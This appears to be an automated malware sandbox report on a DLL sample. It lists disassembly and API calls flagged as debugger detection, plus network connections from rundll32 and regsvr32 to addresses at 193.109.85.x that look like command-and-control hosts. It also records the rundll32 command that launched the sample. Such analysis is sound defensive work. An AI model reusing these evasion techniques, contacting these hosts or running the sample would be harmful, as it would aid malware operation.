Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC7F60 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC7F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDF0C78 mov ecx, dword ptr fs:[00000030h]	18_2_7EDF0C78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDB9C60 mov eax, dword ptr fs:[00000030h]	18_2_7EDB9C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED8BC30 mov edx, dword ptr fs:[00000030h]	18_2_7ED8BC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED8BC30 mov eax, dword ptr fs:[00000030h]	18_2_7ED8BC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED87DB0 mov eax, dword ptr fs:[00000030h]	18_2_7ED87DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED66DAA mov eax, dword ptr fs:[00000030h]	18_2_7ED66DAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED66D10 mov eax, dword ptr fs:[00000030h]	18_2_7ED66D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov eax, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov ecx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov ecx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov ecx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDDFA90 mov eax, dword ptr fs:[00000030h]	18_2_7EDDFA90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC8A40 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC8A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC8A40 mov edx, dword ptr fs:[00000030h]	18_2_7EDC8A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC8A40 mov eax, dword ptr fs:[00000030h]	18_2_7EDC8A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC8A40 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC8A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED87A60 mov edx, dword ptr fs:[00000030h]	18_2_7ED87A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov edx, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA4B90 mov ecx, dword ptr fs:[00000030h]	18_2_7EDA4B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED86B80 mov edx, dword ptr fs:[00000030h]	18_2_7ED86B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov edx, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov ecx, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov edx, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED66B00 mov edx, dword ptr fs:[00000030h]	18_2_7ED66B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED948E0 mov ecx, dword ptr fs:[00000030h]	18_2_7ED948E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64664 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64664 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64664 mov edx, dword ptr fs:[00000030h]	18_2_7ED64664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED79790 mov edx, dword ptr fs:[00000030h]	18_2_7ED79790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED79790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED79790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED79790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED79790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov edx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBA730 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBA730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBA730 mov eax, dword ptr fs:[00000030h]	18_2_7EDBA730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBA730 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBA730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov ecx, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov ecx, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBD5B0 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBD5B0 mov eax, dword ptr fs:[00000030h]	18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBD5B0 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBD5B0 mov edx, dword ptr fs:[00000030h]	18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBD5B0 mov eax, dword ptr fs:[00000030h]	18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBE570 mov eax, dword ptr fs:[00000030h]	18_2_7EDBE570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED8C230 mov eax, dword ptr fs:[00000030h]	18_2_7ED8C230
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED87220 mov edx, dword ptr fs:[00000030h]	18_2_7ED87220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED87220 mov eax, dword ptr fs:[00000030h]	18_2_7ED87220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBE380 mov eax, dword ptr fs:[00000030h]	18_2_7EDBE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBC340 mov eax, dword ptr fs:[00000030h]	18_2_7EDBC340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED8E66B mov ecx, dword ptr fs:[00000030h]	18_2_7ED8E66B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED8E66B mov ecx, dword ptr fs:[00000030h]	18_2_7ED8E66B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64174 mov edx, dword ptr fs:[00000030h]	18_2_7ED64174
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64174 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64174
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED67160 mov edx, dword ptr fs:[00000030h]	18_2_7ED67160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64110 mov edx, dword ptr fs:[00000030h]	18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64110 mov edx, dword ptr fs:[00000030h]	18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBB130 mov eax, dword ptr fs:[00000030h]	18_2_7EDBB130
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBAF80 mov edx, dword ptr fs:[00000030h]	34_2_7EEBAF80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC0DD0 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC0DD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE828BF mov edx, dword ptr fs:[00000030h]	34_2_7EE828BF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBE860 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBE860
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBB430 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBB430 mov eax, dword ptr fs:[00000030h]	34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBB430 mov edx, dword ptr fs:[00000030h]	34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBB430 mov eax, dword ptr fs:[00000030h]	34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBB430 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBE390 mov edx, dword ptr fs:[00000030h]	34_2_7EEBE390
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEA6330 mov ecx, dword ptr fs:[00000030h]	34_2_7EEA6330
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE86ED0 mov edx, dword ptr fs:[00000030h]	34_2_7EE86ED0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEF7EBB mov eax, dword ptr fs:[00000030h]	34_2_7EEF7EBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEF7E46 mov eax, dword ptr fs:[00000030h]	34_2_7EEF7E46
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC7F60 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC7F60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC7F60 mov edx, dword ptr fs:[00000030h]	34_2_7EEC7F60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC7F60 mov eax, dword ptr fs:[00000030h]	34_2_7EEC7F60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC7F60 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC7F60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEB9C60 mov eax, dword ptr fs:[00000030h]	34_2_7EEB9C60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE8BC30 mov edx, dword ptr fs:[00000030h]	34_2_7EE8BC30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE8BC30 mov eax, dword ptr fs:[00000030h]	34_2_7EE8BC30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE66DAA mov eax, dword ptr fs:[00000030h]	34_2_7EE66DAA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE87DB0 mov eax, dword ptr fs:[00000030h]	34_2_7EE87DB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE66D10 mov eax, dword ptr fs:[00000030h]	34_2_7EE66D10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEDFA90 mov eax, dword ptr fs:[00000030h]	34_2_7EEDFA90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE87A60 mov edx, dword ptr fs:[00000030h]	34_2_7EE87A60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE86B80 mov edx, dword ptr fs:[00000030h]	34_2_7EE86B80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEA4B90 mov ecx, dword ptr fs:[00000030h]	34_2_7EEA4B90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE66B00 mov edx, dword ptr fs:[00000030h]	34_2_7EE66B00
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE948E0 mov ecx, dword ptr fs:[00000030h]	34_2_7EE948E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE83992 mov edx, dword ptr fs:[00000030h]	34_2_7EE83992
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64664 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64664
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64664 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64664
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64664 mov edx, dword ptr fs:[00000030h]	34_2_7EE64664
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE79790 mov edx, dword ptr fs:[00000030h]	34_2_7EE79790
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE79790 mov ecx, dword ptr fs:[00000030h]	34_2_7EE79790
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE79790 mov ecx, dword ptr fs:[00000030h]	34_2_7EE79790
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBA730 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBA730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBA730 mov eax, dword ptr fs:[00000030h]	34_2_7EEBA730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBA730 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBA730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBD5B0 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBD5B0 mov eax, dword ptr fs:[00000030h]	34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBD5B0 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBD5B0 mov edx, dword ptr fs:[00000030h]	34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBD5B0 mov eax, dword ptr fs:[00000030h]	34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE8757D mov eax, dword ptr fs:[00000030h]	34_2_7EE8757D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBE570 mov eax, dword ptr fs:[00000030h]	34_2_7EEBE570
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE8C230 mov eax, dword ptr fs:[00000030h]	34_2_7EE8C230
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBE380 mov eax, dword ptr fs:[00000030h]	34_2_7EEBE380
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBC340 mov eax, dword ptr fs:[00000030h]	34_2_7EEBC340
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]	34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE651EF mov ecx, dword ptr fs:[00000030h]	34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE651EF mov eax, dword ptr fs:[00000030h]	34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]	34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]	34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]	34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE67160 mov edx, dword ptr fs:[00000030h]	34_2_7EE67160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64174 mov edx, dword ptr fs:[00000030h]	34_2_7EE64174
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64174 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64174
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBB130 mov eax, dword ptr fs:[00000030h]	34_2_7EEBB130
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64110 mov edx, dword ptr fs:[00000030h]	34_2_7EE64110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64110 mov edx, dword ptr fs:[00000030h]	34_2_7EE64110

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

14_2_7F35B5AE

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_6D0AAAFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_6D0AAAFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_7F3D1B15
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_7F3D18C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_7F3D5753
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_7EDE1B15
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_7EDE18C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_7EDE5753
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_6B86AAFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_6B86AAFD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_7EEE1B15
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_7EEE18C7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_7EEE5753

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 193.109.85.27 443			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 193.109.85.31 54801

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1